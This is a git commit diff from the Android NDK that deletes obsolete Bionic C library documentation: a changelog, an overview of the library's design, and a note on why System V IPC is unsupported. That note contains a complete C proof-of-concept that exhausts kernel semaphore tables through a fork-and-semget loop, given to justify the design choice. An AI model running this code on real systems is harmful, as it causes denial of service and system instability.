diff options
| author | Andrew Hsieh <andrewhsieh@google.com> | 2014-10-28 14:09:48 -0700 |
|---|---|---|
| committer | Andrew Hsieh <andrewhsieh@google.com> | 2014-10-28 14:10:20 -0700 |
| commit | 0173061840137ca92a6d7e4a5717f1b98cda0870 (patch) | |
| tree | eb25f0882946b02e5ab537ee49c5517486d01d49 /docs | |
| parent | 1b89d63868718a383490066c47ced8b31a601519 (diff) | |
| download | ndk-0173061840137ca92a6d7e4a5717f1b98cda0870.tar.gz | |
Remove obsolete libc doc
See b.android.com/72883
Change-Id: Ia6a6e699e5bba43d3fa7cdc37e8b19609b0870a0
Diffstat (limited to 'docs')
| -rw-r--r-- | docs/Additional_library_docs/libc/libc/CHANGES.text | 260 | ||||
| -rw-r--r-- | docs/Additional_library_docs/libc/libc/OVERVIEW.text | 389 | ||||
| -rw-r--r-- | docs/Additional_library_docs/libc/libc/SYSV-IPC.text | 104 |
3 files changed, 0 insertions, 753 deletions
diff --git a/docs/Additional_library_docs/libc/libc/CHANGES.text b/docs/Additional_library_docs/libc/libc/CHANGES.text deleted file mode 100644 index 4f4bbee4d..000000000 --- a/docs/Additional_library_docs/libc/libc/CHANGES.text +++ /dev/null @@ -1,260 +0,0 @@ -<html><body><pre>Bionic ChangeLog: ------------------ - -------------------------------------------------------------------------------- -Differences between Android 2.3 and Android 2.2: - -- <pthread.h>: Add reader/writer locks implementation. Add sanity - checking to pthread_mutex_destroy() (e.g. a locked mutex will return - EBUSY). - -- <semaphore.h>: Use private futexes for semaphore implementation, - unless your set 'pshared' to non-0 when calling sem_init(). - - Also fixed a bug in sem_post() to make it wake up all waiting - threads, instead of one. As a consequence, the maximum semaphore - value is now reduced to 0x3fffffff. - -- <math.h>: Added sincos(), sincosf() and sincosl() (GLibc compatibility). - -- <sys/sysinfo.h>: Added missing sysinfo() system call implementation - (the function was already declared in the header though). - -- sysconf() didn't work for some arguments due to a small bug in the - /proc line parser. - -- <termio.h>: added missing header (just includes <termios.h>) - -- <unistd.h>: add missing declaration for truncate(). The implementation - was already here since Android 1.5. - - modify implementation of alarm() to return 0 in case of error (i.e. - if a value larger than 0x7fffffff seconds is passed to it). This - makes the implementation compliant with the GLibc behaviour. - -- <wchar.h>: small fixes to really support wchar_t in Bionic (not there yet). - - the size of wchar_t is still 32-bit (decided by the compiler) - - WCHAR_MIN: changed from 0 to INT_MIN - WCHAR_MAX: changed from 255 to INT_MAX - - wcpcpy(), wcpncpy(), wcscat(), wcschr(), wcscmp(), - wcscpy(), wcscspn(), wcsdup(), wcslcat(), wcslcpy(), - wcslen(), wcsncat(), wcsncmp(), wcsncpy(), wcsnlen(), - wcspbrk(), wcsrchr(), wcsrchr(), wcsspn(), wcsstr(), - wcstok(), wcswidth(), wmemchr(), wmemcmp(), wmemcpy(), - wmemmove(), wmemset(): Added proper implementations. - - wcscasecmp(), wcsncasecmp(): Added implementation limited - to ASCII codes for lower/upper. - - wcscoll(): added dummy implementation that calls wcscmp() - wcsxfrm(): added dummy implementation that calls wcsncpy() - - NOTE: Technically, this breaks the ABI, but we never claimed to support - wchar_t anyway. The wchar_t support is still *NOT* official at this - point. We need better multi-byte support code, and wprintf/wscanf - stuff too. - -- <inttypes.h>: add missing declarations for strntoimax abd strntoumax. - -- <stdlib.h>: add missing declarations for drand48() and erand48(). - -- clearerr(): fix broken implementation. - -- Feature test macros like _POSIX_C_SOURCE / _XOPEN_SOURCE / _C99_SOURCE - are now handled correctly by our C library headers (see <sys/cdefs.h>) - -- <sys/select.h>: add missing declaration for pselect() - -- <sys/vfs.h>: fixed implementation of fstatfs() (also fixes fpathconf() - which uses it). - -- Added an implementation of pthread_atfork() - -- <dlfcn.h>: fixed dlopen() implementation to support dlopen(NULL, ...). - This allows one to look at the dynamic symbols exported by an executable. - -- <private/bionic_tls.h>: use kernel helper functions for static versions - of the C library. This is necessary because we don't know where the corresponding - machine code is going to run, and the optimization for __get_tls() might - not match the features of the target device where we run a static executable - linked to the C library. This fixes one of the bug that explains why gdbserver - didn't work well with threads. - -------------------------------------------------------------------------------- -Differences between Android 2.2. and Android 2.1: - -- Support FP register save/load in setjmp()/longjmp() on ARMv7 builds. - -- Add support for SH-4 CPU architecture ! - -- __atomic_swap(): use LDREX/STREX CPU instructions on ARMv6 and higher. - -- <arpa/telnet.h>: New header (declarations only, no implementation). - -- <err.h>: New header + implementation. GLibc compatibility. - -- <warn.h>: New header + implementation. GLibc compatibility. - -- <fts.h>: New header + implementation. - -- <mntent.h>: Add missing <stdio.h> include. - -- <regex.h>: New header + implementation. - -- <signal.h>: Added killpg() - -- <stdint.h>: Allow 64-bit type declarations on C99 builds. - -- <stdio.h>: Add fdprintf() and vfdprintf(). Note that GLibc provides - the confusing 'dprintf' and 'vdprintf()' functions instead. - -- <stdlib.h>: Fix ptsname_r(): the return type is int instead of char*. - The mistake comes from a GLibc man page bug (the man page listed a return - type of char*, while the implementation used int. Fixed in late 2009 only). - The Bionic implementation was incorrect. Technically, this is an ABI - breakage, but code that used this function probably never worked or - compiled properly anyway. - -- <strings.h>: Add missing <sys/types.h> include. - -- <sys/queue.h>: Added new header (no implementation - macro templates). - -- <sys/resource.h>: Add rlim_t proper definition. - -- <time64.h>: Add missing C++ header inclusion guards. - -- <unistd.h>: Add getusershell(), setusershell() and endusershell(), though - implementation are bogus. GLibc compatibility. - -- <wchar.h>: Add mbstowcs() and wcstombs() - -- add clone() implementation for ARM (x86 and SH-4 not working yet). - -- <sys/epoll.h>: <sys/system_properties.h>: Add missing C++ inclusion guards - -- fix getpwnam() and getpwgrp() to accept "app_0" as a valid user name. - -- fix sem_trywait() to return -1 and set errno to EAGAIN, instead of - returning EAGAIN directly. - -- fix sem_post() to wake up multiple threads when called rapidly in - succession. - -- DNS: partial implementation of RFC3484 (rule 1, 2, 5, 6, 8, 10 and - modified rule 9), for better address selection/sorting. - In the process, removed code that was previously used for "sortlist" - in /etc/resolv.conf. (resolv.conf is already ignored, so the latter - is a no-op for actual functionality.) - -- fix pthread_sigmask() to properly return an error code without touching - errno. Previous implementation returned -1 on error, setting errno, which - is not Posix compliant. - -- add sigaltstack() implementation for ARM. - -- <time.h>: Properly implement the 'timezone' and 'daylight' global variables - (they were not defined previously, though declared in the header). - -- <time.h>: Fix timezone management implementation to properly update - 'tm_gmtoff' field in 'struct tm' structure. - -- DNS: get rid of spurious random DNS queries when trying to resolve - an unknown domain name. Due to an initialization bug, a random DNS search - list was generated for each thread if net.dns.search is not defined. - -- <pthread.h>: Add pthread_condattr_init/destroy/setpshared/getpshared functions - to enable proper shared conditional variable initialization. - - Modify the pthread_mutex_t and pthread_cond_t implementation to use private - futexes for performance reasons. Mutexes and Condvars are no longer shareable - between processes by default anymore, unless you use PTHREAD_PROCESS_SHARED - with pthread_mutexattr_setpshared() and/or pthread_condattr_setpshared(). - -------------------------------------------------------------------------------- -Differences between Android 2.1 and 2.0.1: - -- zoneinfo: updated data tables to version 2009s - - -------------------------------------------------------------------------------- -Differences between Android 2.0.1 and 2.0: - -- abort(): ARM-specific hack to preserve the 'lr' register when abort() - is called (GCC does not preserve it by default since it thinks that - abort() never returns). This improves stack traces considerably. - - -------------------------------------------------------------------------------- -Differences between Android 2.0 and 1.6: - -- memcmp(), memcpy(): ARMv7 optimized versions. - -- pthread_mutexattr_setpshared(): implementation will not return ENOTSUP - if PTHREAD_PROCESS_SHARED is used, because our Mutex implementation can - work across multiple processes. - - *HOWEVER* it does not use "robust futexes" which means that held mutexes - *are not* automatically released by the kernel when the owner process - crashes or exits. This is only done to simplify communication between - two always-live system processes, DO NOT USE THIS IN APPLICATIONS ! - -- pthread_mutex_lock_timeout_np(): New Android-specific function to - perform a timed lock (). In case of timeout, it returns EBUSY. - -- pthread_cond_timedwait_monotonic_np(): Same as pthread_cond_timedwait() - but uses the monotonic clock(). Android-specific. - -- pthread_cond_timedwait_relative_np(): Same as pthread_cond_timedwait() - but uses a relative timeout instead. Android-specific. - -- <netinet/in.h>: Now includes <netinet/in6.h>. - -- <netinet/in6.h>: Added IPV6_JOIN_GROUP, IPV6_LEAVE_GROUP, IN6ADDR_ANY_INIT - and ipv6mr_interface definitions. - -- <time.h>: - * Add missing tzset() declaration. - * Add Android-specific strftime_tz(). - -- getaddrinfo(): - Only perform IPv6 lookup for AF_UNSPEC if we have IPv6 connectivity. - This saves one DNS query per lookup on non-IPv6 systems. - -- mktime(): Fix an infinite loop problem that appeared when switching to - GCC 4.4.0. - -- strftime(): fix incorrect handling of dates > 2038 due to 64-bit issue - in original code. - -------------------------------------------------------------------------------- -Differences between Android 1.6 and 1.5: - -- C runtime: Fix runtime initialization to be called before any static C++ - constructors. This allows these to use pthread functions properly. - -- __aeabi_atexit(): Fix implementation to properly call C++ static destructors - when the program exits (or when a shared library is unloaded). - -- <sys/stat.h>: added GLibc compatibility macros definitions: - - #define st_atimensec st_atime_nsec - #define st_mtimensec st_mtime_nsec - #define st_ctimensec st_ctime_nsec - -- getaddrinfo(): implementation will now allow numeric ports if ai_socktype is - set to ANY. This is to match the GLibc behaviour. - -- getservent(): and getservent_r() incorrectly returned the port in host-endian - order in the s_port field. It now returns it in big-endian order. - -- DNS: Allow underscore in the middle of DNS labels. While not really - standard, this extension is needed for some VPN configurations and is - supported by other operating systems. - -- DNS: Support for DNS domain search lists through the new net.dns.search - system property. The corresponding value must be a space-separated list of - domain suffixes. -</pre></body></html>
\ No newline at end of file diff --git a/docs/Additional_library_docs/libc/libc/OVERVIEW.text b/docs/Additional_library_docs/libc/libc/OVERVIEW.text deleted file mode 100644 index d02ae573a..000000000 --- a/docs/Additional_library_docs/libc/libc/OVERVIEW.text +++ /dev/null @@ -1,389 +0,0 @@ -<html><body><pre>Bionic C Library Overview: -========================== - -Introduction: - -Core Philosophy: - - The core idea behind Bionic's design is: KEEP IT REALLY SIMPLE. - - This implies that the C library should only provide lightweight wrappers - around kernel facilities and not try to be too smart to deal with edge cases. - - The name "Bionic" comes from the fact that it is part-BSD and part-Linux: - its source code consists of a mix of BSD C library pieces with custom - Linux-specific bits used to deal with threads, processes, signals and a few - others things. - - All original BSD pieces carry the BSD copyright disclaimer. Bionic-specific - bits carry the Android Open Source Project copyright disclaimer. And - everything is released under the BSD license. - -Architectures: - - Bionic currently supports the ARM and x86 instruction sets. In theory, it - should be possible to support more, but this may require a little work (e.g. - adding system call IDs to SYSCALLS.html, described below, or modifying the - dynamic linker). - - The ARM-specific code is under arch-arm/ and the x86-specific one is under - arch-x86/ - - Note that the x86 version is only meant to run on an x86 Android device. We - make absolutely no claim that you could build and use Bionic on a stock x86 - Linux distribution (though that would be cool, so patches are welcomed :-)) - -Syscall stubs: - - Each system call function is implemented by a tiny assembler source fragment - (called a "syscall stub"), which is generated automatically by - tools/gensyscalls.py which reads the SYSCALLS.html file for input. - - SYSCALLS.html contains the list of all syscall stubs to generate, along with - the corresponding syscall numeric identifier (which may differ between ARM - and x86), and its signature - - If you modify this file, you may want to use tools/checksyscalls.py which - checks its content against official Linux kernel header files, and will - report errors when invalid syscall ids are used. - - Sometimes, the C library function is really a wrapper that calls the - corresponding syscall with another name. For example, the exit() function - is provided by the C library and calls the _exit() syscall stub. - - See SYSCALLS.html for documentation and details. - - -time_t: - - time_t is 32-bit as defined by the kernel on 32-bit CPUs. A 64-bit version - would be preferable to avoid the Y2038 bug, but the kernel maintainers - consider that this is not needed at the moment. - - Instead, Bionic provides a <time64.h> header that defines a time64_t type, - and related functions like mktime64(), localtime64(), etc... - - -Timezone management: - - The name of the current timezone is taken from the TZ environment variable, - if defined. Otherwise, the system property named 'persist.sys.timezone' is - checked instead. - - The zoneinfo timezone database and index files are located under directory - /system/usr/share/zoneinfo, instead of the more Posix-compliant path of - /usr/share/zoneinfo - - -off_t: - - For similar reasons, off_t is 32-bit. We define loff_t as the 64-bit variant - due to BSD inheritance, but off64_t should be available as a typedef to ease - porting of current Linux-specific code. - - -Linux kernel headers: - - Bionic comes with its own set of "clean" Linux kernel headers to allow - user-space code to use kernel-specific declarations (e.g. IOCTLs, structure - declarations, constants, etc...). They are located in: - - ./kernel/common, - ./kernel/arch-arm - ./kernel/arch-x86 - - These headers have been generated by a tool (kernel/tools/update-all.py) to - only include the public definitions from the original Linux kernel headers. - - If you want to know why and how this is done, read kernel/README.TXT to get - all the (gory) details. - - -PThread implementation: - - Bionic's C library comes with its own pthread implementation bundled in. - This is different from other historical C libraries which: - - - place it in an external library (-lpthread) - - play linker tricks with weak symbols at dynamic link time - - The support for real-time features (a.k.a. -lrt) is also bundled in the - C library. - - The implementation is based on futexes and strives to provide *very* short - code paths for common operations. Notable features are the following: - - - pthread_mutex_t, pthread_cond_t are only 4 bytes each. - - - Normal, recursive and error-check mutexes are supported, and the code - path is heavily optimized for the normal case, which is used most of - the time. - - - Process-shared mutexes and condition variables are not supported. - Their implementation requires far more complexity and was absolutely - not needed for Android (which uses other inter-process synchronization - capabilities). - - Note that they could be added in the future without breaking the ABI - by specifying more sophisticated code paths (which may make the common - paths slightly slower though). - - - There is currently no support for read/write locks, priority-ceiling in - mutexes and other more advanced features. Again, the main idea being - that this was not needed for Android at all but could be added in the - future. - -pthread_cancel(): - - pthread_cancel() will *not* be supported in Bionic, because doing this would - involve making the C library significantly bigger for very little benefit. - - Consider that: - - - A proper implementation must insert pthread cancellation checks in a lot - of different places of the C library. And conformance is very difficult - to test properly. - - - A proper implementation must also clean up resources, like releasing - memory, or unlocking mutexes, properly if the cancellation happens in a - complex function (e.g. inside gethostbyname() or fprintf() + complex - formatting rules). This tends to slow down the path of many functions. - - - pthread cancellation cannot stop all threads: e.g. it can't do anything - against an infinite loop - - - pthread cancellation itself has short-comings and isn't very portable - (see http://advogato.org/person/slamb/diary.html?start=49 for example). - - All of this is contrary to the Bionic design goals. If your code depends on - thread cancellation, please consider alternatives. - - Note however that Bionic does implement pthread_cleanup_push() and - pthread_cleanup_pop(), which can be used to handle cleanups that happen when - a thread voluntarily exits through pthread_exit() or returning from its - main function. - - -pthread_once(): - - Do not call fork() within a callback provided to pthread_once(). Doing this - may result in a deadlock in the child process the next time it calls - pthread_once(). - - Also, you can't throw a C++ Exception from the callback (see C++ Exception - Support below). - - The current implementation of pthread_once() lacks the necessary support of - multi-core-safe double-checked-locking (read and write barriers). - - -Thread-specific data - - The thread-specific storage only provides for a bit less than 64 - pthread_key_t objects to each process. The implementation provides 64 real - slots but also uses about 5 of them (exact number may depend on - implementation) for its own use (e.g. two slots are pre-allocated by the C - library to speed-up the Android OpenGL sub-system). - - Note that Posix mandates a minimum of 128 slots, but we do not claim to be - Posix-compliant. - - Except for the main thread, the TLS area is stored at the top of the stack. - See comments in bionic/libc/bionic/pthread.c for details. - - At the moment, thread-local storage defined through the __thread compiler - keyword is not supported by the Bionic C library and dynamic linker. - - -Multi-core support - - At the moment, Bionic does not provide or use read/write memory barriers. - This means that using it on certain multi-core systems might not be - supported, depending on its exact CPU architecture. - - -Android-specific features: - - Bionic provides a small number of Android-specific features to its clients: - - - access to system properties: - - Android provides a simple shared value/key space to all processes on the - system. It stores a liberal number of 'properties', each of them being a - simple size-limited string that can be associated to a size-limited - string value. - - The header <sys/system_properties.h> can be used to read system - properties and also defines the maximum size of keys and values. - - - Android-specific user/group management: - - There is no /etc/passwd or /etc/groups in Android. By design, it is - meant to be used by a single handset user. On the other hand, Android - uses the Linux user/group management features extensively to secure - process permissions, like access to various filesystem directories. - - In the Android scheme, each installed application gets its own - uid_t/gid_t starting from 10000; lower numerical ids are reserved for - system daemons. - - getpwnam() recognizes some hard-coded subsystems names (e.g. "radio") - and will translate them to their low-user-id values. It also recognizes - "app_1234" as the synthetic name of the application that was installed - with uid 10000 + 1234, which is 11234. getgrnam() works similarly - - getgrouplist() will always return a single group for any user name, - which is the one passed as an input parameter. - - getgrgid() will similarly only return a structure that contains a - single-element members list, corresponding to the user with the same - numerical value than the group. - - See bionic/libc/bionic/stubs.c for more details. - - - getservent() - - There is no /etc/services on Android. Instead the C library embeds a - constant list of services in its executable, which is parsed on demand - by the various functions that depend on it. See - bionic/libc/netbsd/net/getservent.c and - bionic/libc/netbsd/net/services.h - - The list of services defined internally might change liberally in the - future. This feature is mostly historically and is very rarely used. - - The getservent() returns thread-local data. getservbyport() and - getservbyname() are also implemented in a similar fashion. - - - getprotoent() - - There is no /etc/protocol on Android. Bionic does not currently - implement getprotoent() and related functions. If added, it will - likely be done in a way similar to getservent() - -DNS resolver: - - Bionic uses a NetBSD-derived resolver library which has been modified in - the following ways: - - - don't implement the name-server-switch feature (a.k.a. <nsswitch.h>) - - - read /system/etc/resolv.conf instead of /etc/resolv.conf - - - read the list of servers from system properties. the code looks for - 'net.dns1', 'net.dns2', etc.. Each property should contain the IP - address of a DNS server. - - these properties are set/modified by other parts of the Android system - (e.g. the dhcpd daemon). - - the implementation also supports per-process DNS server list, using the - properties 'net.dns1.<pid>', 'net.dns2.<pid>', etc... Where <pid> stands - for the numerical ID of the current process. - - - when performing a query, use a properly randomized Query ID (instead of - a incremented one), for increased security. - - - when performing a query, bind the local client socket to a random port - for increased security. - - - get rid of *many* unfortunate thread-safety issues in the original code - - Bionic does *not* expose implementation details of its DNS resolver; the - content of <arpa/nameser.h> is intentionally blank. The resolver - implementation might change completely in the future. - - -PThread Real-Time Timers: - - timer_create(), timer_gettime(), timer_settime() and timer_getoverrun() are - supported. - - Bionic also now supports SIGEV_THREAD real-time timers (see timer_create()). - The implementation simply uses a single thread per timer, unlike GLibc which - uses complex heuristics to try to use the less threads possible when several - timers with compatible properties are used. - - This means that if your code uses a lot of SIGEV_THREAD timers, your program - may consume a lot of memory. However, if your program needs many of these - timers, it'd better handle timeout events directly instead. - - Other timers (e.g. SIGEV_SIGNAL) are handled by the kernel and use much less - system resources. - - -Binary Compatibility: - - Bionic is *not* in any way binary-compatible with the GNU C Library, ucLibc - or any known Linux C library. This means several things: - - - You cannot expect to build something against the GNU C Library headers and - have it dynamically link properly to Bionic later. - - - You should *really* use the Android toolchain to build your program against - Bionic. The toolchain deals with many important details that are crucial - to get something working properly. - - Failure to do so will usually result in the inability to run or link your - program, or even runtime crashes. Several random web pages on the Internet - describe how you can successfully write a "hello-world" program with the - ARM GNU toolchain. These examples usually work by chance, if anything else, - and you should not follow these instructions unless you want to waste a lot - of your time in the process. - - Note however that you *can* generate a binary that is built against the - GNU C Library headers and then statically linked to it. The corresponding - executable should be able to run (if it doesn't use dlopen()/dlsym()) - - -Dynamic Linker: - - Bionic comes with its own dynamic linker (just like ld.so on Linux really - comes from GLibc). This linker does not support all the relocations - generated by other GCC ARM toolchains. - - -C++ Exceptions Support: - - At the moment, Bionic doesn't support C++ exceptions, what this really means - is the following: - - - If pthread_once() is called with a C++ callback that throws an exception, - then the C library will keep the corresponding pthread_once_t mutex - locked. Any further call to pthread_once() will result in a deadlock. - - A proper implementation should be able to register a C++ exception - cleanup handler before the callback to properly unlock the - pthread_once_t. Unfortunately this requires tricky assembly code that - is highly dependent on the compiler. - - This feature is not planned to be supported anytime soon. - - - The same problem may arise if you throw an exception within a callback - called from the C library. Fortunately, these cases are very rare in the - real-world, but any callback you provide to the C library should *not* - throw an exception. - - - Bionic lacks a few support functions to have exception support work - properly. - -System V IPCs: - - Bionic intentionally does not provide support for System-V IPCs mechanisms, - like the ones provided by semget(), shmget(), msgget(). The reason for this - is to avoid denial-of-service. For a detailed rationale about this, please - read the file docs/SYSV-IPCS.html. - -Include Paths: - - The Android build system should automatically provide the necessary include - paths required to build against the C library headers. However, if you want - to do that yourself, you will need to add: - - libc/arch-$ARCH/include - libc/include - libc/kernel/common - libc/kernel/arch-$ARCH - - to your C include path. -</pre></body></html>
\ No newline at end of file diff --git a/docs/Additional_library_docs/libc/libc/SYSV-IPC.text b/docs/Additional_library_docs/libc/libc/SYSV-IPC.text deleted file mode 100644 index 0c2584474..000000000 --- a/docs/Additional_library_docs/libc/libc/SYSV-IPC.text +++ /dev/null @@ -1,104 +0,0 @@ -<html><body><pre>Android does not support System V IPCs, i.e. the facilities provided by the -following standard Posix headers: - - <sys/sem.h> /* SysV semaphores */ - <sys/shm.h> /* SysV shared memory segments */ - <sys/msg.h> /* SysV message queues */ - <sys/ipc.h> /* General IPC definitions */ - -The reason for this is due to the fact that, by design, they lead to global -kernel resource leakage. - -For example, there is no way to automatically release a SysV semaphore -allocated in the kernel when: - -- a buggy or malicious process exits -- a non-buggy and non-malicious process crashes or is explicitly killed. - -Killing processes automatically to make room for new ones is an -important part of Android's application lifecycle implementation. This means -that, even assuming only non-buggy and non-malicious code, it is very likely -that over time, the kernel global tables used to implement SysV IPCs will fill -up. - -At that point, strange failures are likely to occur and prevent programs that -use them to run properly until the next reboot of the system. - -And we can't ignore potential malicious applications. As a proof of concept -here is a simple exploit that you can run on a standard Linux box today: - ---------------- cut here ------------------------ -#include <sys/sem.h> -#include <sys/wait.h> -#include <unistd.h> -#include <stdio.h> -#include <stdlib.h> -#include <errno.h> - -#define NUM_SEMAPHORES 32 -#define MAX_FAILS 10 - -int main(void) -{ - int counter = 0; - int fails = 0; - - if (counter == IPC_PRIVATE) - counter++; - - printf( "%d (NUM_SEMAPHORES=%d)\n", counter, NUM_SEMAPHORES); - - for (;;) { - int ret = fork(); - int status; - - if (ret < 0) { - perror("fork:"); - break; - } - if (ret == 0) { - /* in the child */ - ret = semget( (key_t)counter, NUM_SEMAPHORES, IPC_CREAT ); - if (ret < 0) { - return errno; - } - return 0; - } - else { - /* in the parent */ - ret = wait(&status); - if (ret < 0) { - perror("waitpid:"); - break; - } - if (status != 0) { - status = WEXITSTATUS(status); - fprintf(stderr, "child %d FAIL at counter=%d: %d\n", ret, - counter, status); - if (++fails >= MAX_FAILS) - break; - } - } - - counter++; - if ((counter % 1000) == 0) { - printf("%d\n", counter); - } - if (counter == IPC_PRIVATE) - counter++; - } - return 0; -} ---------------- cut here ------------------------ - -If you run it on a typical Linux distribution today, you'll discover that it -will quickly fill up the kernel's table of unique key_t values, and that -strange things will happen in some parts of the system, but not all. - -(You can use the "ipcs -u" command to get a summary describing the kernel - tables and their allocations) - -For example, in our experience, anything program launched after that that -calls strerror() will simply crash. The USB sub-system starts spouting weird -errors to the system console, etc... -</pre></body></html> |